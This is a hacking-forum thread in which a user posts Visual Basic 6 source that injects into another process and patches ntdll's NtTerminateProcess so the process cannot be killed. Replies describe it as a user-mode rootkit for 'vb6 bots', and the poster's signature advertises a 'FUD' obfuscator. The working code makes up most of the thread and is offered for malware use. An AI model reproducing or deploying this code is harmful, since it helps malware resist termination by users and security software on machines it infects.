XR3X

Jump to content


Photo

NtTerminateProcess Hook


  • You cannot start a new topic
  • Please log in to reply
6 replies to this topic

#1 noh4t

noh4t

    Advanced Member

  • Members +
  • 409 posts
  • LocationBasic Input/Output System
Contributor

Posted 16 March 2014 - 04:12 AM

 

     Option Explicit
    Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
    Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
    Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByVal Destination As Long, ByVal Source As Long, ByVal Length As Long)
    Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
    Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
    Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
    Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
    Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function EnumProcessModules Lib "psapi" (ByVal hProcess As Long, ByRef lphModule As Long, ByVal cb As Long, ByVal lpcbNeeded As Long) As Long
    Private Declare Function GetModuleFileNameEx Lib "psapi" Alias "GetModuleFileNameExA" (ByVal hProcess As Long, ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
    Private Const MEM_RELEASE = &H8000
    Private Const MEM_COMMIT = &H1000
    Private Const MEM_RESERVE = &H2000
    Private Const PAGE_EXECUTE_READWRITE = &H40
    Private Const PROCESS_ALL_ACCESS = &H1F0FFF
    Private hProcess As Long
    Private FuncAddr As Long
    Private OldCode(4) As Byte
    Private NewCode(4) As Byte
    Private HookCode(4) As Byte
    Private CodeAddr As Long
    Private Function GetModuleHandleEx(ByVal hProcess As Long, ByVal ModuleName As String) As Long
    Dim hMods(1024) As Long
    Dim cbNeeded As Long
    Dim szModName As String
    Dim i As Integer
    If EnumProcessModules(hProcess, hMods(0), 1025 * 4, VarPtr(cbNeeded)) Then
    For i = 0 To (cbNeeded / 4)
    If hMods(i) Then
    szModName = String(260, 0)
    If GetModuleFileNameEx(hProcess, hMods(i), szModName, Len(szModName)) Then
    szModName = Left(szModName, InStr(1, szModName, Chr(0)) - 1)
    If LCase(szModName) = LCase(ModuleName) Then '
    GetModuleHandleEx = hMods(i)
    Erase hMods
    Exit Function
    End If
    End If
    End If
    Next i
    End If
    Erase hMods
    End Function
    Public Function HookNtTerminateProcess(ByVal ProcessId As Long) As Boolean
    Dim hMod As Long
    NewCode(0) = &HE9 ' jmp
    ' xor eax,eax
    ' ret 8
    HookCode(0) = &H33
    HookCode(1) = &HC0
    HookCode(2) = &HC2
    HookCode(3) = &H8
    HookCode(4) = &H0
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, False, ProcessId)
    If hProcess Then
    hMod = GetModuleHandleEx(hProcess, "c:\windows\system32\ntdll.dll")
    If hMod Then
    FuncAddr = GetProcAddress(hMod, "NtTerminateProcess")
    If FuncAddr Then
    ReadProcessMemory hProcess, ByVal FuncAddr, OldCode(0), 5, 0
    CodeAddr = VirtualAllocEx(hProcess, ByVal 0, 5, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    If CodeAddr Then
    CopyMemory VarPtr(NewCode(1)), VarPtr(CodeAddr - FuncAddr - 5), 4
    WriteProcessMemory hProcess, ByVal CodeAddr, HookCode(0), 5, 0
    WriteProcessMemory hProcess, ByVal FuncAddr, NewCode(0), 5, 0
    HookNtTerminateProcess = True
    End If
    End If
    End If
    End If
    End Function
    Public Sub UnhookNtTerminateProcess()
    WriteProcessMemory hProcess, ByVal FuncAddr, OldCode(0), 5, 0
    VirtualFreeEx hProcess, ByVal CodeAddr, 5, MEM_RELEASE
    CloseHandle hProcess
    End Sub

 


  • iCode, Wylde, Cryptotoad and 1 other like this

Obfuscator - x64/x86 [0/35]
-Dynamic Output-

- FUD-

Pm For Jabber.


#2 d3k

d3k

    Banned

  • Banned
  • 79 posts

Posted 16 March 2014 - 09:26 PM

Hopefully now SF will have a new standard - All vb6 bots will have ring3 rootkit.



#3 __Digital__

__Digital__

    Newbie

  • Members +
  • 6 posts

Posted 20 June 2014 - 09:19 PM

nice code and works very well thanks for the share



#4 iCode

iCode

    Advanced Member

  • Loyalist
  • 386 posts

Posted 24 June 2014 - 09:18 AM

How come you're using GetModuleHandleEx instead of GetModuleHandle or LoadLibrary? Also using the full file path is not necessary with those API's.


Edited by iCode, 24 June 2014 - 09:24 AM.


#5 OXYMORON

OXYMORON

    Member

  • Members +
  • 59 posts

Posted 24 June 2014 - 10:57 AM

How come you're using GetModuleHandleEx instead of GetModuleHandle or LoadLibrary? Also using the full file path is not necessary with those API's.

 

I don't think he has coded this so he may not know.. but @noh4t, do you know who did code this nice piece of code?



#6 Neelix

Neelix

    ☮٠ૐ ٠PЄƛƇЄ• ॐ •LƠƔЄ• ॐ •UƝITẙ• ॐ

  • Moderator
  • 891 posts
  • Locationmsfconsole
Contributor

Posted 24 June 2014 - 05:45 PM

Please Login or Register to see this Hidden Content

 

credits to subhash dasyam

 

guess !  he was also known as 7 (some peeps might remember him)


  • iCode likes this

#7 OXYMORON

OXYMORON

    Member

  • Members +
  • 59 posts

Posted 24 June 2014 - 07:04 PM

Please Login or Register to see this Hidden Content

 

credits to subhash dasyam

 

guess !  he was also known as 7 (some peeps might remember him)

 

Thanks Neelix for that precision! Yeah used to know this guy, was sharing a lot in there before. Mr 7 :)


  • iCode likes this